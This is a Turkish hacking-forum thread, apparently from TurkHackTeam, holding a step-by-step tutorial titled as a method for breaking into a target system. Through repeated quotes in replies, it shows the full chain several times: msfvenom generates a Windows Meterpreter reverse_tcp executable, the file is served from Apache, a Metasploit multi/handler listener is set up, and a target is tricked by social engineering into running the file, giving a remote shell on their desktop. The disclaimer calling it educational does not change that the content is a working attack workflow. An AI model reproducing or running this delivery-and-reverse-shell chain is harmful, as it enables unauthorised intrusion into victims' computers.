Payload Oluştururak Hedef Sisteme Sızma Detaylı Anlatım !

fayrtek

Uzman üye
9 Nis 2021
1,173
386
23
İnternetin Derinliklerinde...
Payload Oluşturarak Saldırı Yöntemi

Hepiniz hoşgeldiniz bugün sizinle bir payload oluşturup hedef sisteme erişim sağlamak için bir deneme yapacağız bunun için msfvenom aracımızı kullacağız.Msfvenom aracımız kali linux’umuzda yüklü olarak gelmektedir.


Peki gelelim saldırıya hazırsak başlayalım amacımız hedef sisteme bir link vasıtasıyla indirme dosyası göndermek ve bununla etkileşime geçmesini sağlamak bunun için sosyal mühendislik kullanmamız çok önemli.

Öncelikle terminalimizi açıyoruz ve payloadlarımızı görüntülemek için terminalimize msfvenom –l paylaods yazıyoruz.



Vermiş olduğu payloadları yukarıdaki görselde görebilirsiniz haydi devam edelim…



Meterpreter gelişmiş bir oturum olduğu için meterpreter kullanmayı tercih ediyorum ama buradaki payloadları kendinize göre dizayn edip kullanabilirsiniz.

Burada seçtiğimiz payloadın bizden hangi bilgileri istediğini görmek için

Msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options



Mavi : Seçtiğimiz payloadı tanıması için kullandığımız parametre

Kırmızı : Seçmiş olduğumuz payload

Yeşil : Payloadın bizden istediklerini görüntülediğimiz parametre





Payloadın bir temel birde gelişmiş değerleri vardır bizim payloadımızın çalışması için temel bilgileri girmemiz yeterli olacaktır (Basic options).



Bu kullanmış olduğum payload Windows 64 bit üzerinde kullanabildiğim bir doğrudan bağlantı payloadıdır. Devam edelim görüntüde bizden LPORT ve LHOST değerlerini girmemizi istiyor yani benim ip adresim ve kullanacağım port hemen aşağıdaki gibi değerlerimizi girelim ve daha sonrasında payloadımızı bir .exe formatına dönüştürüp kayıt edelim.






Evet görmüş olduğunuz gibi bilgilerimi girdim ve bulunduğum dizine payloadımı bir exe dosyası halinde kaydettim.



-f = kaydedeceğimiz dosya formatı

-o = kaydedeceğimiz exe dosyasının adlandırılması.




Şimdi geldi bağlantıyı hedefe ulaştırmaya bu dosyayı ulaştırmak için bunu kali linuxun apache serverına alacağım daha sonrasında apache serverını başlatıp ip adresi üzerinden hedefe ulaşacak şekilde kullanılabilir hale getireceğim.



Öncelikle exe dosyasımızı kali kinuxta apache serverının kurulu olduğu dizine yani web serverının kurulu olduğu dizine gönderiyorum.

cp baglantideneme.exe /var/www/html/ komutunu kullanarak bahsettiğim dizine gönderip service apache2 start komutumu kullanarak apache serverimi başlatıyorum.





Evet artık hedef bilgisayarımızda etkileşim sağlamak için 2 adım kaldı
1. adım msfconsole üzerinden olası bir etkileşim durumunda hedef sistemi dinleyebilmek için kullanacağımız parametre

2. adım en önemlisi bu adresi hedefe tıklatabilmek (linkimiz ip adresimiz üzerinden oluşur fakat çeşitli araçlar kullanarak linkimizin adını değiştirebiliriz deneme yaptığım için değiştirme gereği duymuyorum)



Öncelikle hedefe linkimizi atıp etkileşime girmeden önce msfconsole aracımızı çalıştırıyoruz.

Metasploit aracımızda bu tarz bağlantıların tümünü dinlemeye yarayan parametremizi seçmek için ;

use exploit/multi/handler komutunu yazıyoruz.




Kullanmış olduğumuz exploit herhangi bir bilgi istemiyor fakat bizim oluşturmuş olduğumuz payloadın bilgilerini girmemiz gerekiyor ki dinlemeyi gerçekleştirebilsin bunun için ;

set payload windows/meterpreter/reverse_tcp


Komutunu kullanarak payloadımızı exploitimize ekliyoruz.



Şimdi bizden hangi değerleri girmemizi istiyor bir göz atalım bunun için Show options komutunu kullanıyorum ;





Burada yalnızca LHOST ve LPORT değerlerini girmemiz dinlemeye başlaması için yeterli olacaktır.



set LHOST 192.168.6.128

set LPORT 9876


Yazarak bilgilerimi giriyorum.




Eveet artık hazırız dinleyebiliyoruz ;



Sırada aşağıdaki görselde bulunan çalıştıra hedefi tıklatmak ve daha sonra sistemdeyiz buraya link olarak oluşturduğumuz payloadı çalıştırmak için http://192.168.6.128/baglantideneme.exe adresini paylaşıyoruz ve alt kışında çalıştır seçeneği çıkıyor buna tıkladığı anda artık sistemdeyiz.





Ve artık meterpreter yazısını görüyorsanız ohhh çekebilirsiniz ;)






Tebrikler artık sistemde istediğiniz gibi gezebilirsiniz.

Mesela bir masaüstüne gidip neler var neler yok bakalım.


Meterpreter oturumundayken ls yapıp bulunduğum dizinde neler var bir göz atalım.





Şuan hedef sistemin masaüstündeyim ve Tht deneme dosyası adında bir klasör bulunuyor bi girip bakalım bunun için;

Cd thtdenemedosyasi dosyası yazıyorum.






İçerisindeki krypthondan Sevgiler txt dosyasını görüntüleyebilirsiniz.



Evet bugün elimden geldiği kadarıyla sizlere bir sızma işlemi gösterdim yapılan herhangi bir illegal olayda bundan TurkHackTeam ailesi ve Krypthon sorumlu değildir !!!!!! Sadece öğretici ve deneme amaçlıdır İyi Forumlar Dilerim…

Krypthon…



Hocam öncelikle detaydan kaçınmadığınız bu anlatımdan Elinize Ellerinize sağlık fakat bunlar gerekli kurulum yapıldığında termux'ta da geçerli olurmu???
 

Krypthon

Katılımcı Üye
21 Ağu 2021
795
752
Tien-Şan
Hocam öncelikle detaydan kaçınmadığınız bu anlatımdan Elinize Ellerinize sağlık fakat bunlar gerekli kurulum yapıldığında termux'ta da geçerli olurmu???
Güzel yorumunuz için çok teşekkür ederim msfvenomu termuxta kullanamıyorsunuz diye biliyorum ama siz gene deneyin aynı payloadı msfconsole üzerinden bulup işleminizi gene gerçekleştirebilirsiniz.
 

CasPeRAB

Uzman üye
7 Kas 2021
1,146
461
TR❤AZ
Payload Oluşturarak Saldırı Yöntemi

Hepiniz hoşgeldiniz bugün sizinle bir payload oluşturup hedef sisteme erişim sağlamak için bir deneme yapacağız bunun için msfvenom aracımızı kullacağız.Msfvenom aracımız kali linux’umuzda yüklü olarak gelmektedir.


Peki gelelim saldırıya hazırsak başlayalım amacımız hedef sisteme bir link vasıtasıyla indirme dosyası göndermek ve bununla etkileşime geçmesini sağlamak bunun için sosyal mühendislik kullanmamız çok önemli.

Öncelikle terminalimizi açıyoruz ve payloadlarımızı görüntülemek için terminalimize msfvenom –l paylaods yazıyoruz.



Vermiş olduğu payloadları yukarıdaki görselde görebilirsiniz haydi devam edelim…



Meterpreter gelişmiş bir oturum olduğu için meterpreter kullanmayı tercih ediyorum ama buradaki payloadları kendinize göre dizayn edip kullanabilirsiniz.

Burada seçtiğimiz payloadın bizden hangi bilgileri istediğini görmek için

Msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options



Mavi : Seçtiğimiz payloadı tanıması için kullandığımız parametre

Kırmızı : Seçmiş olduğumuz payload

Yeşil : Payloadın bizden istediklerini görüntülediğimiz parametre





Payloadın bir temel birde gelişmiş değerleri vardır bizim payloadımızın çalışması için temel bilgileri girmemiz yeterli olacaktır (Basic options).



Bu kullanmış olduğum payload Windows 64 bit üzerinde kullanabildiğim bir doğrudan bağlantı payloadıdır. Devam edelim görüntüde bizden LPORT ve LHOST değerlerini girmemizi istiyor yani benim ip adresim ve kullanacağım port hemen aşağıdaki gibi değerlerimizi girelim ve daha sonrasında payloadımızı bir .exe formatına dönüştürüp kayıt edelim.






Evet görmüş olduğunuz gibi bilgilerimi girdim ve bulunduğum dizine payloadımı bir exe dosyası halinde kaydettim.



-f = kaydedeceğimiz dosya formatı

-o = kaydedeceğimiz exe dosyasının adlandırılması.




Şimdi geldi bağlantıyı hedefe ulaştırmaya bu dosyayı ulaştırmak için bunu kali linuxun apache serverına alacağım daha sonrasında apache serverını başlatıp ip adresi üzerinden hedefe ulaşacak şekilde kullanılabilir hale getireceğim.



Öncelikle exe dosyasımızı kali kinuxta apache serverının kurulu olduğu dizine yani web serverının kurulu olduğu dizine gönderiyorum.

cp baglantideneme.exe /var/www/html/ komutunu kullanarak bahsettiğim dizine gönderip service apache2 start komutumu kullanarak apache serverimi başlatıyorum.





Evet artık hedef bilgisayarımızda etkileşim sağlamak için 2 adım kaldı
1. adım msfconsole üzerinden olası bir etkileşim durumunda hedef sistemi dinleyebilmek için kullanacağımız parametre

2. adım en önemlisi bu adresi hedefe tıklatabilmek (linkimiz ip adresimiz üzerinden oluşur fakat çeşitli araçlar kullanarak linkimizin adını değiştirebiliriz deneme yaptığım için değiştirme gereği duymuyorum)



Öncelikle hedefe linkimizi atıp etkileşime girmeden önce msfconsole aracımızı çalıştırıyoruz.

Metasploit aracımızda bu tarz bağlantıların tümünü dinlemeye yarayan parametremizi seçmek için ;

use exploit/multi/handler komutunu yazıyoruz.




Kullanmış olduğumuz exploit herhangi bir bilgi istemiyor fakat bizim oluşturmuş olduğumuz payloadın bilgilerini girmemiz gerekiyor ki dinlemeyi gerçekleştirebilsin bunun için ;

set payload windows/meterpreter/reverse_tcp


Komutunu kullanarak payloadımızı exploitimize ekliyoruz.



Şimdi bizden hangi değerleri girmemizi istiyor bir göz atalım bunun için Show options komutunu kullanıyorum ;





Burada yalnızca LHOST ve LPORT değerlerini girmemiz dinlemeye başlaması için yeterli olacaktır.



set LHOST 192.168.6.128

set LPORT 9876


Yazarak bilgilerimi giriyorum.




Eveet artık hazırız dinleyebiliyoruz ;



Sırada aşağıdaki görselde bulunan çalıştıra hedefi tıklatmak ve daha sonra sistemdeyiz buraya link olarak oluşturduğumuz payloadı çalıştırmak için http://192.168.6.128/baglantideneme.exe adresini paylaşıyoruz ve alt kışında çalıştır seçeneği çıkıyor buna tıkladığı anda artık sistemdeyiz.





Ve artık meterpreter yazısını görüyorsanız ohhh çekebilirsiniz ;)






Tebrikler artık sistemde istediğiniz gibi gezebilirsiniz.

Mesela bir masaüstüne gidip neler var neler yok bakalım.


Meterpreter oturumundayken ls yapıp bulunduğum dizinde neler var bir göz atalım.





Şuan hedef sistemin masaüstündeyim ve Tht deneme dosyası adında bir klasör bulunuyor bi girip bakalım bunun için;

Cd thtdenemedosyasi dosyası yazıyorum.






İçerisindeki krypthondan Sevgiler txt dosyasını görüntüleyebilirsiniz.



Evet bugün elimden geldiği kadarıyla sizlere bir sızma işlemi gösterdim yapılan herhangi bir illegal olayda bundan TurkHackTeam ailesi ve Krypthon sorumlu değildir !!!!!! Sadece öğretici ve deneme amaçlıdır İyi Forumlar Dilerim…

Krypthon…



Elinize Sağlık
 

Adanalıtrojan

Kıdemli Üye
25 Haz 2021
2,024
1,053
16
Konya Ovası Askeri Tesislerinde
Payload Oluşturarak Saldırı Yöntemi

Hepiniz hoşgeldiniz bugün sizinle bir payload oluşturup hedef sisteme erişim sağlamak için bir deneme yapacağız bunun için msfvenom aracımızı kullacağız.Msfvenom aracımız kali linux’umuzda yüklü olarak gelmektedir.


Peki gelelim saldırıya hazırsak başlayalım amacımız hedef sisteme bir link vasıtasıyla indirme dosyası göndermek ve bununla etkileşime geçmesini sağlamak bunun için sosyal mühendislik kullanmamız çok önemli.

Öncelikle terminalimizi açıyoruz ve payloadlarımızı görüntülemek için terminalimize msfvenom –l paylaods yazıyoruz.



Vermiş olduğu payloadları yukarıdaki görselde görebilirsiniz haydi devam edelim…



Meterpreter gelişmiş bir oturum olduğu için meterpreter kullanmayı tercih ediyorum ama buradaki payloadları kendinize göre dizayn edip kullanabilirsiniz.

Burada seçtiğimiz payloadın bizden hangi bilgileri istediğini görmek için

Msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options



Mavi : Seçtiğimiz payloadı tanıması için kullandığımız parametre

Kırmızı : Seçmiş olduğumuz payload

Yeşil : Payloadın bizden istediklerini görüntülediğimiz parametre





Payloadın bir temel birde gelişmiş değerleri vardır bizim payloadımızın çalışması için temel bilgileri girmemiz yeterli olacaktır (Basic options).



Bu kullanmış olduğum payload Windows 64 bit üzerinde kullanabildiğim bir doğrudan bağlantı payloadıdır. Devam edelim görüntüde bizden LPORT ve LHOST değerlerini girmemizi istiyor yani benim ip adresim ve kullanacağım port hemen aşağıdaki gibi değerlerimizi girelim ve daha sonrasında payloadımızı bir .exe formatına dönüştürüp kayıt edelim.






Evet görmüş olduğunuz gibi bilgilerimi girdim ve bulunduğum dizine payloadımı bir exe dosyası halinde kaydettim.



-f = kaydedeceğimiz dosya formatı

-o = kaydedeceğimiz exe dosyasının adlandırılması.




Şimdi geldi bağlantıyı hedefe ulaştırmaya bu dosyayı ulaştırmak için bunu kali linuxun apache serverına alacağım daha sonrasında apache serverını başlatıp ip adresi üzerinden hedefe ulaşacak şekilde kullanılabilir hale getireceğim.



Öncelikle exe dosyasımızı kali kinuxta apache serverının kurulu olduğu dizine yani web serverının kurulu olduğu dizine gönderiyorum.

cp baglantideneme.exe /var/www/html/ komutunu kullanarak bahsettiğim dizine gönderip service apache2 start komutumu kullanarak apache serverimi başlatıyorum.





Evet artık hedef bilgisayarımızda etkileşim sağlamak için 2 adım kaldı
1. adım msfconsole üzerinden olası bir etkileşim durumunda hedef sistemi dinleyebilmek için kullanacağımız parametre

2. adım en önemlisi bu adresi hedefe tıklatabilmek (linkimiz ip adresimiz üzerinden oluşur fakat çeşitli araçlar kullanarak linkimizin adını değiştirebiliriz deneme yaptığım için değiştirme gereği duymuyorum)



Öncelikle hedefe linkimizi atıp etkileşime girmeden önce msfconsole aracımızı çalıştırıyoruz.

Metasploit aracımızda bu tarz bağlantıların tümünü dinlemeye yarayan parametremizi seçmek için ;

use exploit/multi/handler komutunu yazıyoruz.




Kullanmış olduğumuz exploit herhangi bir bilgi istemiyor fakat bizim oluşturmuş olduğumuz payloadın bilgilerini girmemiz gerekiyor ki dinlemeyi gerçekleştirebilsin bunun için ;

set payload windows/meterpreter/reverse_tcp


Komutunu kullanarak payloadımızı exploitimize ekliyoruz.



Şimdi bizden hangi değerleri girmemizi istiyor bir göz atalım bunun için Show options komutunu kullanıyorum ;





Burada yalnızca LHOST ve LPORT değerlerini girmemiz dinlemeye başlaması için yeterli olacaktır.



set LHOST 192.168.6.128

set LPORT 9876


Yazarak bilgilerimi giriyorum.




Eveet artık hazırız dinleyebiliyoruz ;



Sırada aşağıdaki görselde bulunan çalıştıra hedefi tıklatmak ve daha sonra sistemdeyiz buraya link olarak oluşturduğumuz payloadı çalıştırmak için http://192.168.6.128/baglantideneme.exe adresini paylaşıyoruz ve alt kışında çalıştır seçeneği çıkıyor buna tıkladığı anda artık sistemdeyiz.





Ve artık meterpreter yazısını görüyorsanız ohhh çekebilirsiniz ;)






Tebrikler artık sistemde istediğiniz gibi gezebilirsiniz.

Mesela bir masaüstüne gidip neler var neler yok bakalım.


Meterpreter oturumundayken ls yapıp bulunduğum dizinde neler var bir göz atalım.





Şuan hedef sistemin masaüstündeyim ve Tht deneme dosyası adında bir klasör bulunuyor bi girip bakalım bunun için;

Cd thtdenemedosyasi dosyası yazıyorum.






İçerisindeki krypthondan Sevgiler txt dosyasını görüntüleyebilirsiniz.



Evet bugün elimden geldiği kadarıyla sizlere bir sızma işlemi gösterdim yapılan herhangi bir illegal olayda bundan TurkHackTeam ailesi ve Krypthon sorumlu değildir !!!!!! Sadece öğretici ve deneme amaçlıdır İyi Forumlar Dilerim…

Krypthon…



Buram buram emek kokuyor hocam ellerinize sağlık sayenizde tekrar etmis oldum ☺☺
 

Mertoktay5

Üye
5 Ara 2021
227
95
Payload Oluşturarak Saldırı Yöntemi

Hepiniz hoşgeldiniz bugün sizinle bir payload oluşturup hedef sisteme erişim sağlamak için bir deneme yapacağız bunun için msfvenom aracımızı kullacağız.Msfvenom aracımız kali linux’umuzda yüklü olarak gelmektedir.


Peki gelelim saldırıya hazırsak başlayalım amacımız hedef sisteme bir link vasıtasıyla indirme dosyası göndermek ve bununla etkileşime geçmesini sağlamak bunun için sosyal mühendislik kullanmamız çok önemli.

Öncelikle terminalimizi açıyoruz ve payloadlarımızı görüntülemek için terminalimize msfvenom –l paylaods yazıyoruz.



Vermiş olduğu payloadları yukarıdaki görselde görebilirsiniz haydi devam edelim…



Meterpreter gelişmiş bir oturum olduğu için meterpreter kullanmayı tercih ediyorum ama buradaki payloadları kendinize göre dizayn edip kullanabilirsiniz.

Burada seçtiğimiz payloadın bizden hangi bilgileri istediğini görmek için

Msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options



Mavi : Seçtiğimiz payloadı tanıması için kullandığımız parametre

Kırmızı : Seçmiş olduğumuz payload

Yeşil : Payloadın bizden istediklerini görüntülediğimiz parametre





Payloadın bir temel birde gelişmiş değerleri vardır bizim payloadımızın çalışması için temel bilgileri girmemiz yeterli olacaktır (Basic options).



Bu kullanmış olduğum payload Windows 64 bit üzerinde kullanabildiğim bir doğrudan bağlantı payloadıdır. Devam edelim görüntüde bizden LPORT ve LHOST değerlerini girmemizi istiyor yani benim ip adresim ve kullanacağım port hemen aşağıdaki gibi değerlerimizi girelim ve daha sonrasında payloadımızı bir .exe formatına dönüştürüp kayıt edelim.






Evet görmüş olduğunuz gibi bilgilerimi girdim ve bulunduğum dizine payloadımı bir exe dosyası halinde kaydettim.



-f = kaydedeceğimiz dosya formatı

-o = kaydedeceğimiz exe dosyasının adlandırılması.




Şimdi geldi bağlantıyı hedefe ulaştırmaya bu dosyayı ulaştırmak için bunu kali linuxun apache serverına alacağım daha sonrasında apache serverını başlatıp ip adresi üzerinden hedefe ulaşacak şekilde kullanılabilir hale getireceğim.



Öncelikle exe dosyasımızı kali kinuxta apache serverının kurulu olduğu dizine yani web serverının kurulu olduğu dizine gönderiyorum.

cp baglantideneme.exe /var/www/html/ komutunu kullanarak bahsettiğim dizine gönderip service apache2 start komutumu kullanarak apache serverimi başlatıyorum.





Evet artık hedef bilgisayarımızda etkileşim sağlamak için 2 adım kaldı
1. adım msfconsole üzerinden olası bir etkileşim durumunda hedef sistemi dinleyebilmek için kullanacağımız parametre

2. adım en önemlisi bu adresi hedefe tıklatabilmek (linkimiz ip adresimiz üzerinden oluşur fakat çeşitli araçlar kullanarak linkimizin adını değiştirebiliriz deneme yaptığım için değiştirme gereği duymuyorum)



Öncelikle hedefe linkimizi atıp etkileşime girmeden önce msfconsole aracımızı çalıştırıyoruz.

Metasploit aracımızda bu tarz bağlantıların tümünü dinlemeye yarayan parametremizi seçmek için ;

use exploit/multi/handler komutunu yazıyoruz.




Kullanmış olduğumuz exploit herhangi bir bilgi istemiyor fakat bizim oluşturmuş olduğumuz payloadın bilgilerini girmemiz gerekiyor ki dinlemeyi gerçekleştirebilsin bunun için ;

set payload windows/meterpreter/reverse_tcp


Komutunu kullanarak payloadımızı exploitimize ekliyoruz.



Şimdi bizden hangi değerleri girmemizi istiyor bir göz atalım bunun için Show options komutunu kullanıyorum ;





Burada yalnızca LHOST ve LPORT değerlerini girmemiz dinlemeye başlaması için yeterli olacaktır.



set LHOST 192.168.6.128

set LPORT 9876


Yazarak bilgilerimi giriyorum.




Eveet artık hazırız dinleyebiliyoruz ;



Sırada aşağıdaki görselde bulunan çalıştıra hedefi tıklatmak ve daha sonra sistemdeyiz buraya link olarak oluşturduğumuz payloadı çalıştırmak için http://192.168.6.128/baglantideneme.exe adresini paylaşıyoruz ve alt kışında çalıştır seçeneği çıkıyor buna tıkladığı anda artık sistemdeyiz.





Ve artık meterpreter yazısını görüyorsanız ohhh çekebilirsiniz ;)






Tebrikler artık sistemde istediğiniz gibi gezebilirsiniz.

Mesela bir masaüstüne gidip neler var neler yok bakalım.


Meterpreter oturumundayken ls yapıp bulunduğum dizinde neler var bir göz atalım.





Şuan hedef sistemin masaüstündeyim ve Tht deneme dosyası adında bir klasör bulunuyor bi girip bakalım bunun için;

Cd thtdenemedosyasi dosyası yazıyorum.






İçerisindeki krypthondan Sevgiler txt dosyasını görüntüleyebilirsiniz.



Evet bugün elimden geldiği kadarıyla sizlere bir sızma işlemi gösterdim yapılan herhangi bir illegal olayda bundan TurkHackTeam ailesi ve Krypthon sorumlu değildir !!!!!! Sadece öğretici ve deneme amaçlıdır İyi Forumlar Dilerim…

Krypthon…



Tesekkurler emek harcamissin ellerine,emeyine,yureyine saglik
 

trombolol33001

Katılımcı Üye
19 Kas 2021
420
142
18
Payload Oluşturarak Saldırı Yöntemi

Hepiniz hoşgeldiniz bugün sizinle bir payload oluşturup hedef sisteme erişim sağlamak için bir deneme yapacağız bunun için msfvenom aracımızı kullacağız.Msfvenom aracımız kali linux’umuzda yüklü olarak gelmektedir.


Peki gelelim saldırıya hazırsak başlayalım amacımız hedef sisteme bir link vasıtasıyla indirme dosyası göndermek ve bununla etkileşime geçmesini sağlamak bunun için sosyal mühendislik kullanmamız çok önemli.

Öncelikle terminalimizi açıyoruz ve payloadlarımızı görüntülemek için terminalimize msfvenom –l paylaods yazıyoruz.



Vermiş olduğu payloadları yukarıdaki görselde görebilirsiniz haydi devam edelim…



Meterpreter gelişmiş bir oturum olduğu için meterpreter kullanmayı tercih ediyorum ama buradaki payloadları kendinize göre dizayn edip kullanabilirsiniz.

Burada seçtiğimiz payloadın bizden hangi bilgileri istediğini görmek için

Msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options



Mavi : Seçtiğimiz payloadı tanıması için kullandığımız parametre

Kırmızı : Seçmiş olduğumuz payload

Yeşil : Payloadın bizden istediklerini görüntülediğimiz parametre





Payloadın bir temel birde gelişmiş değerleri vardır bizim payloadımızın çalışması için temel bilgileri girmemiz yeterli olacaktır (Basic options).



Bu kullanmış olduğum payload Windows 64 bit üzerinde kullanabildiğim bir doğrudan bağlantı payloadıdır. Devam edelim görüntüde bizden LPORT ve LHOST değerlerini girmemizi istiyor yani benim ip adresim ve kullanacağım port hemen aşağıdaki gibi değerlerimizi girelim ve daha sonrasında payloadımızı bir .exe formatına dönüştürüp kayıt edelim.






Evet görmüş olduğunuz gibi bilgilerimi girdim ve bulunduğum dizine payloadımı bir exe dosyası halinde kaydettim.



-f = kaydedeceğimiz dosya formatı

-o = kaydedeceğimiz exe dosyasının adlandırılması.




Şimdi geldi bağlantıyı hedefe ulaştırmaya bu dosyayı ulaştırmak için bunu kali linuxun apache serverına alacağım daha sonrasında apache serverını başlatıp ip adresi üzerinden hedefe ulaşacak şekilde kullanılabilir hale getireceğim.



Öncelikle exe dosyasımızı kali kinuxta apache serverının kurulu olduğu dizine yani web serverının kurulu olduğu dizine gönderiyorum.

cp baglantideneme.exe /var/www/html/ komutunu kullanarak bahsettiğim dizine gönderip service apache2 start komutumu kullanarak apache serverimi başlatıyorum.





Evet artık hedef bilgisayarımızda etkileşim sağlamak için 2 adım kaldı
1. adım msfconsole üzerinden olası bir etkileşim durumunda hedef sistemi dinleyebilmek için kullanacağımız parametre

2. adım en önemlisi bu adresi hedefe tıklatabilmek (linkimiz ip adresimiz üzerinden oluşur fakat çeşitli araçlar kullanarak linkimizin adını değiştirebiliriz deneme yaptığım için değiştirme gereği duymuyorum)



Öncelikle hedefe linkimizi atıp etkileşime girmeden önce msfconsole aracımızı çalıştırıyoruz.

Metasploit aracımızda bu tarz bağlantıların tümünü dinlemeye yarayan parametremizi seçmek için ;

use exploit/multi/handler komutunu yazıyoruz.




Kullanmış olduğumuz exploit herhangi bir bilgi istemiyor fakat bizim oluşturmuş olduğumuz payloadın bilgilerini girmemiz gerekiyor ki dinlemeyi gerçekleştirebilsin bunun için ;

set payload windows/meterpreter/reverse_tcp


Komutunu kullanarak payloadımızı exploitimize ekliyoruz.



Şimdi bizden hangi değerleri girmemizi istiyor bir göz atalım bunun için Show options komutunu kullanıyorum ;





Burada yalnızca LHOST ve LPORT değerlerini girmemiz dinlemeye başlaması için yeterli olacaktır.



set LHOST 192.168.6.128

set LPORT 9876


Yazarak bilgilerimi giriyorum.




Eveet artık hazırız dinleyebiliyoruz ;



Sırada aşağıdaki görselde bulunan çalıştıra hedefi tıklatmak ve daha sonra sistemdeyiz buraya link olarak oluşturduğumuz payloadı çalıştırmak için http://192.168.6.128/baglantideneme.exe adresini paylaşıyoruz ve alt kışında çalıştır seçeneği çıkıyor buna tıkladığı anda artık sistemdeyiz.





Ve artık meterpreter yazısını görüyorsanız ohhh çekebilirsiniz ;)






Tebrikler artık sistemde istediğiniz gibi gezebilirsiniz.

Mesela bir masaüstüne gidip neler var neler yok bakalım.


Meterpreter oturumundayken ls yapıp bulunduğum dizinde neler var bir göz atalım.





Şuan hedef sistemin masaüstündeyim ve Tht deneme dosyası adında bir klasör bulunuyor bi girip bakalım bunun için;

Cd thtdenemedosyasi dosyası yazıyorum.






İçerisindeki krypthondan Sevgiler txt dosyasını görüntüleyebilirsiniz.



Evet bugün elimden geldiği kadarıyla sizlere bir sızma işlemi gösterdim yapılan herhangi bir illegal olayda bundan TurkHackTeam ailesi ve Krypthon sorumlu değildir !!!!!! Sadece öğretici ve deneme amaçlıdır İyi Forumlar Dilerim…

Krypthon…



Elinize sağlık
 

Krypthon

Katılımcı Üye
21 Ağu 2021
795
752
Tien-Şan

TALMAN

Yeni üye
30 Mar 2022
2
0
Payload Oluşturarak Saldırı Yöntemi

Hepiniz hoşgeldiniz bugün sizinle bir payload oluşturup hedef sisteme erişim sağlamak için bir deneme yapacağız bunun için msfvenom aracımızı kullacağız.Msfvenom aracımız kali linux’umuzda yüklü olarak gelmektedir.


Peki gelelim saldırıya hazırsak başlayalım amacımız hedef sisteme bir link vasıtasıyla indirme dosyası göndermek ve bununla etkileşime geçmesini sağlamak bunun için sosyal mühendislik kullanmamız çok önemli.

Öncelikle terminalimizi açıyoruz ve payloadlarımızı görüntülemek için terminalimize msfvenom –l paylaods yazıyoruz.



Vermiş olduğu payloadları yukarıdaki görselde görebilirsiniz haydi devam edelim…



Meterpreter gelişmiş bir oturum olduğu için meterpreter kullanmayı tercih ediyorum ama buradaki payloadları kendinize göre dizayn edip kullanabilirsiniz.

Burada seçtiğimiz payloadın bizden hangi bilgileri istediğini görmek için

Msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options



Mavi : Seçtiğimiz payloadı tanıması için kullandığımız parametre

Kırmızı : Seçmiş olduğumuz payload

Yeşil : Payloadın bizden istediklerini görüntülediğimiz parametre





Payloadın bir temel birde gelişmiş değerleri vardır bizim payloadımızın çalışması için temel bilgileri girmemiz yeterli olacaktır (Basic options).



Bu kullanmış olduğum payload Windows 64 bit üzerinde kullanabildiğim bir doğrudan bağlantı payloadıdır. Devam edelim görüntüde bizden LPORT ve LHOST değerlerini girmemizi istiyor yani benim ip adresim ve kullanacağım port hemen aşağıdaki gibi değerlerimizi girelim ve daha sonrasında payloadımızı bir .exe formatına dönüştürüp kayıt edelim.






Evet görmüş olduğunuz gibi bilgilerimi girdim ve bulunduğum dizine payloadımı bir exe dosyası halinde kaydettim.



-f = kaydedeceğimiz dosya formatı

-o = kaydedeceğimiz exe dosyasının adlandırılması.




Şimdi geldi bağlantıyı hedefe ulaştırmaya bu dosyayı ulaştırmak için bunu kali linuxun apache serverına alacağım daha sonrasında apache serverını başlatıp ip adresi üzerinden hedefe ulaşacak şekilde kullanılabilir hale getireceğim.



Öncelikle exe dosyasımızı kali kinuxta apache serverının kurulu olduğu dizine yani web serverının kurulu olduğu dizine gönderiyorum.

cp baglantideneme.exe /var/www/html/ komutunu kullanarak bahsettiğim dizine gönderip service apache2 start komutumu kullanarak apache serverimi başlatıyorum.





Evet artık hedef bilgisayarımızda etkileşim sağlamak için 2 adım kaldı
1. adım msfconsole üzerinden olası bir etkileşim durumunda hedef sistemi dinleyebilmek için kullanacağımız parametre

2. adım en önemlisi bu adresi hedefe tıklatabilmek (linkimiz ip adresimiz üzerinden oluşur fakat çeşitli araçlar kullanarak linkimizin adını değiştirebiliriz deneme yaptığım için değiştirme gereği duymuyorum)



Öncelikle hedefe linkimizi atıp etkileşime girmeden önce msfconsole aracımızı çalıştırıyoruz.

Metasploit aracımızda bu tarz bağlantıların tümünü dinlemeye yarayan parametremizi seçmek için ;

use exploit/multi/handler komutunu yazıyoruz.




Kullanmış olduğumuz exploit herhangi bir bilgi istemiyor fakat bizim oluşturmuş olduğumuz payloadın bilgilerini girmemiz gerekiyor ki dinlemeyi gerçekleştirebilsin bunun için ;

set payload windows/meterpreter/reverse_tcp


Komutunu kullanarak payloadımızı exploitimize ekliyoruz.



Şimdi bizden hangi değerleri girmemizi istiyor bir göz atalım bunun için Show options komutunu kullanıyorum ;





Burada yalnızca LHOST ve LPORT değerlerini girmemiz dinlemeye başlaması için yeterli olacaktır.



set LHOST 192.168.6.128

set LPORT 9876


Yazarak bilgilerimi giriyorum.




Eveet artık hazırız dinleyebiliyoruz ;



Sırada aşağıdaki görselde bulunan çalıştıra hedefi tıklatmak ve daha sonra sistemdeyiz buraya link olarak oluşturduğumuz payloadı çalıştırmak için http://192.168.6.128/baglantideneme.exe adresini paylaşıyoruz ve alt kışında çalıştır seçeneği çıkıyor buna tıkladığı anda artık sistemdeyiz.





Ve artık meterpreter yazısını görüyorsanız ohhh çekebilirsiniz ;)






Tebrikler artık sistemde istediğiniz gibi gezebilirsiniz.

Mesela bir masaüstüne gidip neler var neler yok bakalım.


Meterpreter oturumundayken ls yapıp bulunduğum dizinde neler var bir göz atalım.





Şuan hedef sistemin masaüstündeyim ve Tht deneme dosyası adında bir klasör bulunuyor bi girip bakalım bunun için;

Cd thtdenemedosyasi dosyası yazıyorum.






İçerisindeki krypthondan Sevgiler txt dosyasını görüntüleyebilirsiniz.



Evet bugün elimden geldiği kadarıyla sizlere bir sızma işlemi gösterdim yapılan herhangi bir illegal olayda bundan TurkHackTeam ailesi ve Krypthon sorumlu değildir !!!!!! Sadece öğretici ve deneme amaçlıdır İyi Forumlar Dilerim…

Krypthon…



Eline emeğine sağlık
 
Üst

